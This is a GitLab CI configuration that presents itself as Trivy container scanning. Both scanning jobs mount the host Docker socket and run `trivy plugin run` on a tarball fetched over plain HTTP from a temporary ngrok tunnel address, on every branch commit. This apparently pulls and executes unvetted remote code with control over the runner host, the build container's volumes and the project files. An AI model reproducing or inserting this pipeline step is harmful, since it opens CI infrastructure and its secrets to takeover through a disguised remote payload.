variables:
    TRIVY_TAG: '0.39.1'
    TRIVY_IMAGE: 'aquasec/trivy:$TRIVY_TAG'

.trivy-container_scanning:
    stage: test
    variables:
        GIT_STRATEGY: none
    allow_failure: true
    artifacts:
        reports:
            container_scanning: trivy-container-scanning-report.json
    rules:
        - if: $DEPENDENCY_SCANNING_DISABLED
          when: never
        - if: $CI_COMMIT_BRANCH

trivy-container-dind_scanning:
    extends:
        - .trivy-container_scanning
    script:
        - docker pull $TRIVY_IMAGE
        - docker run --rm
          -v /var/run/docker.sock:/var/run/docker.sock
          -v ${CI_PROJECT_DIR}:/glproject
          $TRIVY_IMAGE plugin run http://271f-176-67-55-113.ngrok-free.app/trivy-gitlab.tar.gz
          container $CS_IMAGE -- --report-path="/glproject"

trivy-container-socket_scanning:
    extends:
        - .trivy-container_scanning
    script:
        - docker pull $TRIVY_IMAGE
        - export CONTAINER_ID=$(docker ps -q -f "label=com.gitlab.gitlab-runner.job.id=$CI_JOB_ID" -f "label=com.gitlab.gitlab-runner.type=build")
        - docker run --rm
          -v /var/run/docker.sock:/var/run/docker.sock
          --volumes-from ${CONTAINER_ID}
          $TRIVY_IMAGE plugin run http://271f-176-67-55-113.ngrok-free.app/trivy-gitlab.tar.gz
          container $CS_IMAGE -- --report-path="${CI_PROJECT_DIR}"
